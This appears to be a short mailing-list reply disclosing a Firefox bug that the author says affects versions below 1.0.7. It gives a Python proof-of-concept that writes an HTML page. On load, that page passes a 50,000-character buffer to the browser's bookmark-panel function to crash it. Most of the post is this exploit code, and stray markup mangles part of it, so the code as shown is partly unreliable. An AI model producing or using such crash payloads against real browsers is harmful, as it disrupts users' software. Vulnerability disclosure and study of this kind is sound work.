Hello Sumit,<br><br>I saw this for some time ago too and I far as I know the below code would do the same,<br>with the versions below 1.0.7. As I remember were all input fields "vulnerable". I have <br>choosen the bookmark "name" field, which will popup after loading with a long buffer.
<br><br>html = open("firefox.html", "w")<br>buff = 'A' * 50000<br>html.write("<html><head>\n"<br> "<script type=\"text/javascript\">\n"<br> "function bookmarksite(title, url){\n"
<br> "if (document.all)\n"<br> "window.external.AddFavorite(url, title);\n"<br> "else if (window.sidebar)\n"<br> "window.sidebar.addPanel(title, url, \"\")}\n"
<br> "</script></head>\n"<br> "<body onload=\"javascript:bookmarksit<div id="mb_2">e('"+buff+"', '<a>http://www.mozilla.org')\"
</a>>\n"<br> "</body></html>")<br>html.close()<br><br>Regards,<br><br>Casiamo</div>